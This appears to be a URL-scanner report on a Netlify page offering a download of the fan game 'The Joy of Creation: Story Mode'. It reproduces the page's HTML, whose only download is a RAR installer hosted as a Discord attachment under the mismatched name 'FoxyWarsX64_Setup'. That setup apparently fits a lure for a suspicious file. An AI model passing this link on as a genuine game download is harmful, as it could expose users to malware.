https://foxywars.netlify.app/

URL inviato:
https://foxywars.netlify.app/
Report terminato:
LinkTesto
https://cdn.discordapp.com/attachments/1285870117279891478/1298385677242728570/FoxyWarsX64_Setup_1.0.0_1.rar?ex=67195f64&is=67180de4&hm=d4b3c4f28b4fbf995ab6cd567a08facf1458c1587e36311ded139686b971a690&Windows

Variabili JavaScript · 3 trovate

NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Messaggi di log della console · 0 trovati

HTML

<!DOCTYPE html><html lang="tr"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>The Joy of Creation</title>
    <link rel="stylesheet" href="styles.css">
    <link rel="icon" href="photos/favicon.ico" type="image/x-icon">

   <!-- Open Graph Meta Tags -->
   <meta property="og:title" content="The Joy of Creation: Story Mode">
   <meta property="og:description" content="The Joy of Creation is a great game that combines gaming strategy! Play now!">
   <meta property="og:image" content="https://foxywars.com/photos/resim1.png"> <!-- Görselin URL'si -->
   <meta property="og:url" content="https://foxywars.com">
   <meta property="og:type" content="website">
</head>
<body>
    <!-- Yüklenme ekranı -->
    <div id="loading" style="display: none;">
        <div class="spinner"></div>
    </div>
    <header>
        <div class="header-content">
            <h1>The Joy of Creation: Story Mode</h1>
            <nav>
                <ul>
                    <li><a href="#hikaye">Story</a></li>
                    <li><a href="#features">Features</a></li>
                    <li><a href="#galeri">Gallery</a></li>
                    <li><a href="#gereksinimler">Download</a></li>
                </ul>
            </nav>
        </div>
    </header>
    <section id="hikaye">
        <h2>Story</h2>
        <p class="game-info">This is a Five Nights at Freddy's fan-game. FNaF and its characters are owned by Scott Cawthon.</p>
        <p>It's the night of August 8th 2016, and Five Nights at Freddy's 2nd Anniversary has passed. Celebrated worldwide, the hit indie horror series and its creator have made themselves a place in modern culture and the hearts of many.</p>
        <p>But success doesn't only bring fortune to your doorstep.</p>
        <p>Play through the eyes of Scott Cawthon and his family, as they try to survive inside their own home on the dreadful night that brought the horror into reality, the scorched beings whose origin and motives are yet unknown. Find the secrets lurking in the house, and uncover the mysterious events that led to the cancellation of the next game in the series.</p>
        <p>The tragedy that ended Five Nights at Freddy's.</p>
    </section>
    <section id="features">
        <h2>Features</h2>
        <ul>
            <li>5 unique levels with their own different gameplay.</li>
            <li>First person cutscenes with voice acting.</li>
            <li>Custom soundtrack.</li>
            <li>Custom sounds.</li>
            <li>And more.</li>
        </ul>
    </section>
    <section id="galeri">
        <h2>Gallery</h2>
        <div class="galeri-resimler">
            <img src="photos/resim1.png" alt="Oyun Görüntüsü 1">
            <img src="photos/resim2.png" alt="Oyun Görüntüsü 2">
            <img src="photos/resim3.png" alt="Oyun Görüntüsü 3">
            <img src="photos/resim4.png" alt="Oyun Görüntüsü 4">
            <img src="photos/resim5.png" alt="Oyun Görüntüsü 5">
            <!-- Daha fazla resim ekleyin -->
        </div>
    </section>
    <section id="gereksinimler">
        <h2>Download</h2>
        <p class="requirements-info">Check if your system meets the requirements to experience The Joy of Creation: Story Mode at its best.</p>
        <ul class="system-requirements">
            <li>Windows 7 64-bit or later.</li>
            <li>Quad-core Intel or AMD processor, 2.5 GHz or faster.</li>
            <li>NVIDIA GeForce 470 GTX or AMD Radeon 6870 HD series card or higher.</li>
            <li>4 GB RAM or more.</li>
            <a href="https://cdn.discordapp.com/attachments/1285870117279891478/1298385677242728570/FoxyWarsX64_Setup_1.0.0_1.rar?ex=67195f64&amp;is=67180de4&amp;hm=d4b3c4f28b4fbf995ab6cd567a08facf1458c1587e36311ded139686b971a690&amp;" class="buton">Windows</a>
        </ul>
    </section>
    <footer>
        <p><a href="#">Twitter</a> | <a href="#">Discord</a></p>
        <p>© 2024 by Nikson. All rights reserved.</p>
    </footer>

    <script>
        // Yüklenme ekranını 1 saniye gösterecek
        window.addEventListener('load', () => {
            setTimeout(() => {
                document.getElementById('loading').style.display = 'none';
            }, 1000); // 1000 ms = 1 saniye
        });
    </script>


</body></html>